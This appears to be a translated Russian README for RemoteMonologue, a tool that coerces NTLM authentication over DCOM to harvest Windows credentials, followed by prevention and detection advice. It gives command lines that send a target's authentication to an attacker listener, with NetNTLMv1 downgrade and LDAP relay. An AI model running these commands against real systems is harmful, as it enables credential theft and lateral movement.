
Использование DCOM для принуждения к аутентификации NTLM
RemoteMonologue — это техника сбора учётных данных Windows, которая позволяет удалённо скомпрометировать пользователя, используя ключ Interactive User RunAs и принудительно вызывая NTLM-аутентификации через DCOM.
Подробную информацию см. в статье X-Force Red RemoteMonologue: применение DCOM для принудительных NTLM-аутентификаций.
🔹 Принудительная аутентификация через DCOM (-dcom)
ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession), чтобы вызвать NTLM-аутентификацию против указанного слушателя (-auth-to).🔹 Подбор учётных данных (-spray)
🔹 Атака понижения до NetNTLMv1 (-downgrade)
🔹 Злоупотребление службой WebClient (-webclient)
🔹 Перечисление пользователей (-query)
Примечание: требуются права локального администратора на целевой системе.
pip install impacket
Ниже приведён пример запуска RemoteMonologue с атакой понижения до NetNTLMv1 при использовании Responder в качестве слушателя. По умолчанию, если параметр DCOM не указан, инструмент использует объект DCOM ServerDataCollectorSet.
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

Ниже ещё один пример: на этот раз атака выполняется с использованием объекта DCOM FileSystemImage и включением службы WebClient для получения HTTP-аутентификации, которая затем ретранслируется на LDAP с помощью ntlmrelayx.
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

Для защиты от этих техник и их обнаружения можно реализовать несколько профилактических и детектирующих мер.
Профилактические меры:
Включите подпись LDAP и привязку каналов: настройте принудительную подпись LDAP и привязку каналов на контроллерах домена для защиты конечной точки LDAP от атак ретрансляции. Примечание: эти параметры будут применяться по умолчанию, начиная с Windows Server 2025.
Обновитесь до последних версий Windows: обновите серверы до Windows Server 2025, а рабочие станции — до Windows 11 версии 24H2, чтобы снизить риск атак понижения NetNTLM, поскольку в этих версиях NTLMv1 удалён.
Принудительно включите подпись SMB: включите и применяйте подпись SMB на серверах Windows для предотвращения атак ретрансляции SMB.
Внедрите строгие политики паролей: применяйте требования к надёжным паролям, чтобы усложнить атаки по подбору паролей.
Возможности обнаружения:
Отслеживайте удалённый доступ к объектам DCOM: регистрируйте доступ к затронутым объектам DCOM и их конкретным свойствам и методам, чтобы выявлять необычную активность.
Отслеживайте изменения в реестре: контролируйте изменения ключей реестра RunAs и LmCompatibilityLevel.
Отслеживайте активность службы WebClient: выявляйте случаи удалённого включения службы WebClient, поскольку она используется для обеспечения HTTP-аутентификаций NTLM.